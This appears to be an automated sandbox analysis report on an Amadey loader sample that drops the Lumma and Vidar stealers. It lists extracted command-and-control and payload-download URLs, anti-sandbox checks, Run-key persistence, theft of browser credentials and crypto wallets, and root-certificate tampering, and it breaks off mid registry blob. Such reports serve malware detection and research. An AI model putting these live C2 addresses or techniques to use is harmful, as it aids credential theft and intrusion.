amadey | fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/03/2025, 15:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
Size

1.8MB
MD5

e74b537fdba9af9c83579432d7107627
SHA1

5127e6d77e38aca75a65f529444f719121b49416
SHA256

fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6
SHA512

2dec46234f2766f7c2ac7a3b958a15724f3d3fe79d3fd19b027755a75dabb8bc338e9f70bf3e4d9387cb1d4df7ffc1b453caf58d65697d4792454b912c5b581d
SSDEEP

49152:9iaa2xk0sV9LEstt/P8LA6XL2DGlf2XKZY:c2OR3EsH/kLA02SeXKa

Score

10^/10

amadey gcleaner healer lumma vidar 092155 ir7am defense_evasion discovery dropper execution loader persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://zfurrycomp.top/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://larisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://garisechairedd.shop/api

https://0modelshiverd.icu/api

https://arisechairedd.shop/api

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/memory/1540-794-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral1/memory/1564-873-0x0000000000AE0000-0x0000000000DA0000-memory.dmp	healer
behavioral1/memory/1564-872-0x0000000000AE0000-0x0000000000DA0000-memory.dmp	healer

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 2924 created 1224	2924	Occupation.com	21
PID 2924 created 1224	2924	Occupation.com	21
PID 580 created 1224	580	Seat.com	21
PID 580 created 1224	580	Seat.com	21

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	daaa9cab9e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	54ac06cb5b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e2ba769276.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	yUI6F6C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CgmaT61.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe

Blocklisted process makes network request 10 IoCs

flow	pid	Process
7	2412	powershell.exe
8	2836	powershell.exe
685	1680	powershell.exe
692	1680	powershell.exe
698	1680	powershell.exe
701	1680	powershell.exe
764	556	powershell.exe
766	556	powershell.exe
769	556	powershell.exe
775	556	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1516	powershell.exe
1680	powershell.exe
1676	powershell.exe
556	powershell.exe
2412	powershell.exe
2836	powershell.exe
1592	powershell.exe
2600	powershell.exe
2524	powershell.exe
1188	powershell.exe

Downloads MZ/PE file 25 IoCs

flow	pid	Process
771	828	BitLockerToGo.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1301	2708	rapes.exe
1740	1428	Gxtuum.exe
1740	1428	Gxtuum.exe
7	2412	powershell.exe
8	2836	powershell.exe
5	2708	rapes.exe
5	2708	rapes.exe
5	2708	rapes.exe
5	2708	rapes.exe
5	2708	rapes.exe
5	2708	rapes.exe
5	2708	rapes.exe
5	2708	rapes.exe
140	2768	BitLockerToGo.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000400000001ccbc-766.dat	net_reactor
behavioral1/memory/2224-774-0x00000000002D0000-0x0000000000330000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	yUI6F6C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CgmaT61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e2ba769276.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	yUI6F6C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	54ac06cb5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	daaa9cab9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	daaa9cab9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	54ac06cb5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e2ba769276.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CgmaT61.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url	cmd.exe

Executes dropped EXE 29 IoCs

pid	Process
2708	rapes.exe
2044	ReK7Ewx.exe
2924	Occupation.com
2416	cfa5113e1e.exe
1560	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
448	XxzH301.exe
2428	483d2fa8a0d53818306efeb32d3.exe
1536	4jblLC1.exe
2368	daaa9cab9e.exe
2824	54ac06cb5b.exe
1560	CONAtdrive.exe
1080	e2ba769276.exe
1812	f8ea4e4a49.exe
2352	f8ea4e4a49.exe
1592	CONAtdrive.exe
992	m4mrV1B.exe
1720	m4mrV1B.exe
2068	4jblLC1.exe
564	XxzH301.exe
2960	ReK7Ewx.exe
1580	Occupation.com
1112	V0Bt74c.exe
1592	V0Bt74c.exe
1588	yUI6F6C.exe
1728	ADFoyxP.exe
580	Seat.com
1908	zY9sqWs.exe
1428	Gxtuum.exe
2204	CgmaT61.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	daaa9cab9e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	54ac06cb5b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	CgmaT61.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	e2ba769276.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	yUI6F6C.exe

Loads dropped DLL 64 IoCs

pid	Process
1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
2708	rapes.exe
2020	cmd.exe
2708	rapes.exe
2412	powershell.exe
2412	powershell.exe
2708	rapes.exe
2708	rapes.exe
2836	powershell.exe
2836	powershell.exe
2708	rapes.exe
2924	Occupation.com
2708	rapes.exe
2708	rapes.exe
2708	rapes.exe
2708	rapes.exe
1536	4jblLC1.exe
2708	rapes.exe
2708	rapes.exe
2708	rapes.exe
1812	f8ea4e4a49.exe
3008	WerFault.exe
3008	WerFault.exe
3008	WerFault.exe
3008	WerFault.exe
3008	WerFault.exe
1064	WerFault.exe
1064	WerFault.exe
1064	WerFault.exe
1064	WerFault.exe
1064	WerFault.exe
2708	rapes.exe
2708	rapes.exe
2708	rapes.exe
2708	rapes.exe
2708	rapes.exe
2768	BitLockerToGo.exe
2708	rapes.exe
2516	cmd.exe
2708	rapes.exe
1112	V0Bt74c.exe
2532	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe
2152	WerFault.exe
2152	WerFault.exe
2152	WerFault.exe
2152	WerFault.exe
2152	WerFault.exe
2708	rapes.exe
2708	rapes.exe
2304	WerFault.exe
2304	WerFault.exe
2304	WerFault.exe
828	BitLockerToGo.exe
2708	rapes.exe
2008	cmd.exe
2708	rapes.exe
1908	zY9sqWs.exe
2708	rapes.exe
2708	rapes.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\cfa5113e1e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10141700101\\cfa5113e1e.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10141710121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	m4mrV1B.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	m4mrV1B.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
682	bitbucket.org
685	bitbucket.org
692	bitbucket.org
769	bitbucket.org
775	bitbucket.org

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000500000001998a-126.dat	autoit_exe
behavioral1/files/0x000400000001cddc-847.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
1292	tasklist.exe
2436	tasklist.exe
1736	tasklist.exe
2340	tasklist.exe
332	tasklist.exe
2864	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
2708	rapes.exe
1560	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
2428	483d2fa8a0d53818306efeb32d3.exe
2368	daaa9cab9e.exe
2824	54ac06cb5b.exe
1080	e2ba769276.exe
1588	yUI6F6C.exe
2204	CgmaT61.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2368 set thread context of 2768	2368	daaa9cab9e.exe	84
PID 1812 set thread context of 2352	1812	f8ea4e4a49.exe	88
PID 1080 set thread context of 828	1080	e2ba769276.exe	100
PID 1112 set thread context of 1592	1112	V0Bt74c.exe	128

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\PerfectlyFda	ADFoyxP.exe
File opened for modification	C:\Windows\AccreditationShed	ADFoyxP.exe
File opened for modification	C:\Windows\HighKerry	ADFoyxP.exe
File opened for modification	C:\Windows\PracticalPrevent	ADFoyxP.exe
File opened for modification	C:\Windows\PracticeRoot	ReK7Ewx.exe
File opened for modification	C:\Windows\PlatesRegister	ReK7Ewx.exe
File opened for modification	C:\Windows\UpdatedMakeup	ADFoyxP.exe
File opened for modification	C:\Windows\CombatTongue	ReK7Ewx.exe
File opened for modification	C:\Windows\PracticeRoot	ReK7Ewx.exe
File opened for modification	C:\Windows\CombatTongue	ReK7Ewx.exe
File opened for modification	C:\Windows\FilenameWho	ADFoyxP.exe
File created	C:\Windows\Tasks\rapes.job	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
File opened for modification	C:\Windows\PlatesRegister	ReK7Ewx.exe
File opened for modification	C:\Windows\GovernmentsHighly	ADFoyxP.exe
File created	C:\Windows\Tasks\Gxtuum.job	zY9sqWs.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
3008	1812	WerFault.exe	87
1064	2352	WerFault.exe	88
2532	1112	WerFault.exe	127
2152	1592	WerFault.exe	128
2304	1588	WerFault.exe	131
2384	2204	WerFault.exe	157
2340	2224	WerFault.exe	159
1044	2788	WerFault.exe	168

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CgmaT61.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4jblLC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CONAtdrive.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	V0Bt74c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f8ea4e4a49.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	54ac06cb5b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Seat.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f8ea4e4a49.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReK7Ewx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	V0Bt74c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Occupation.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cfa5113e1e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XxzH301.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CONAtdrive.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e2ba769276.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADFoyxP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1996	netsh.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2896	timeout.exe

Kills process with taskkill 4 IoCs

defense_evasion

pid	Process
2140	taskkill.exe
828	taskkill.exe
1824	taskkill.exe
1776	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	f8ea4e4a49.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	f8ea4e4a49.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131